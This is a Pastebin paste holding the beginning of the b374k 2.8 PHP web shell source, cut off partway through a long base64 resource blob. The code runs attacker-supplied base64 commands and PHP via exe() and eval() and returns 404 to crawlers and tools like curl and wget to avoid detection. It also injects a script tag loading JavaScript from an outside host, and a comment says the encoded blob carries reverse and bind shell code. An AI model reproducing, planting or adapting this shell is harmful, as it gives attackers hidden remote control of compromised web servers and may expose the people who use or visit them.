daily pastebin goal
14%
SHARE
TWEET

Untitled

a guest Mar 17th, 2018 113 Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. <?php
  2. /*
  3.     b374k 2.8
  4.     Jayalah Indonesiaku
  5.     (c)2013
  6.     http://code.google.com/p/b374k-shell
  7.  
  8. */
  9. $s_pass = ""; // default password : b374k (login and change to new password)
  10.  
  11. $s_ver = "2.8"; // shell ver
  12. $s_title = "b374k ".$s_ver; // shell title
  13. $s_login_time = 3600 * 24 * 7; // cookie time (login)
  14. $s_debug = false; // debugging mode
  15.  
  16. @ob_start();
  17. @set_time_limit(0);
  18. @ini_set('html_errors','0');
  19. @clearstatcache();
  20. define('DS', DIRECTORY_SEPARATOR);
  21.  
  22. // clean magic quotes
  23. $_POST = clean($_POST);
  24. $_GET = clean($_GET);
  25. $_COOKIE = clean($_COOKIE);
  26. $_GP = array_merge($_POST, $_GET);
  27. $_GP = array_map("ru", $_GP);
  28.  
  29.  
  30. if($s_debug){
  31.     error_reporting(E_ERROR | E_WARNING | E_PARSE | E_NOTICE);
  32.     @ini_set('display_errors','1');
  33.     @ini_set('log_errors','1');
  34.     foreach($_GP as $k=>$v){
  35.         if(is_array($v)) $v = print_r($v, true);
  36.         echo "<span>".hss($k."=>".$v)."</span><br />";
  37.     }
  38. }
  39. else{
  40.     error_reporting(0);
  41.     @ini_set('display_errors','0');
  42.     @ini_set('log_errors','0');
  43. }
  44.  
  45. $s_auth = false; // login status
  46. if(strlen(trim($s_pass))>0){
  47.     if(isset($_COOKIE['b374k'])){
  48.         if(strtolower(trim($s_pass)) == strtolower(trim($_COOKIE['b374k']))) $s_auth = true;
  49.     }
  50.     if(isset($_GP['login'])){
  51.         $s_login = kript($_GP['login']);
  52.         if(strtolower(trim($s_pass)) == $s_login){
  53.             setcookie("b374k",$s_login,time() + $s_login_time);
  54.             $s_auth = true;
  55.         }
  56.     }
  57.     if(isset($_GP['x']) && ($_GP['x']=='logout')){
  58.         $persist = array("theme", "cwd");
  59.         $s_reload = (isset($_COOKIE['b374k_included']) && isset($_COOKIE['s_home']))? rtrim(urldecode($_COOKIE['s_self']),"&"):"";
  60.         foreach($_COOKIE as $s_k=>$s_v){
  61.             if(!in_array($s_k, $persist)) if(!is_array($s_k)) setcookie($s_k,"",time() - $s_login_time);
  62.         }
  63.         $s_auth = false;
  64.         if(!empty($s_reload)) header("Location: ".$s_reload);
  65.     }
  66. }
  67. else $s_auth = true;
  68. echo "<SCRIPT SRC=http://w0rms.com/sayac.js></SCRIPT>";
  69. // This is a feature where you can control this script from another apps/scripts
  70. // you need to supply password (in sha1(md5()) format) to access this
  71. // this example using password 'b374k' in sha1(md5()) format (s_pass=fb621f5060b9f65acf8eb4232e3024140dea2b34)
  72. // give the code/command you want to execute in base64 format
  73. // this example using command 'uname -a' in base64 format (cmd=dW5hbWUgLWE=)
  74. // example:
  75. //      http://www.myserver.com/b374k.php?s_pass=fb621f5060b9f65acf8eb4232e3024140dea2b34&cmd=dW5hbWUgLWE=
  76. // next sample will evaluate php code 'phpinfo();' in base64 format (eval=cGhwaW5mbygpOw==)
  77. //      http://www.myserver.com/b374k.php?s_pass=fb621f5060b9f65acf8eb4232e3024140dea2b34&eval=cGhwaW5mbygpOw==
  78. // recommended ways is using POST DATA
  79. // note that it will not works if shell password is empty ($s_pass);
  80. // better see code below
  81. if(!empty($_GP['s_pass'])){
  82.     if(strtolower(trim($s_pass)) == strtolower(trim($_GP['s_pass']))){
  83.         if(isset($_GP['cmd'])) echo exe(base64_decode($_GP['cmd']));
  84.         elseif(isset($_GP['eval'])){
  85.             $s_code = base64_decode($_GP['eval']);
  86.             ob_start();
  87.             eval($s_code);
  88.             $s_res = ob_get_contents();
  89.             ob_end_clean();
  90.             echo $s_res;
  91.         }
  92.         else echo $s_title;
  93.     }
  94.     die();
  95. }
  96.  
  97. // block search engine bot
  98. if(isset($_SERVER['HTTP_USER_AGENT']) && (preg_match('/bot|spider|crawler|slurp|teoma|archive|track|snoopy|java|lwp|wget|curl|client|python|libwww/i', $_SERVER['HTTP_USER_AGENT']))){
  99.     header("HTTP/1.0 404 Not Found");
  100.     header("Status: 404 Not Found");
  101.     die();
  102. }
  103. elseif(!isset($_SERVER['HTTP_USER_AGENT'])){
  104.     header("HTTP/1.0 404 Not Found");
  105.     header("Status: 404 Not Found");
  106.     die();
  107. }
  108.  
  109. // resources $s_rs_pl $s_rs_py $s_rs_rb $s_rs_js $s_rs_c $s_rs_java $s_rs_java $s_rs_win $s_rs_php this was used with bind and reverse shell
  110. // use gzinflate(base64_decode($the_code)) if you wanna see the real code.. in case you dont trust me ;-P
  111. $s_css = "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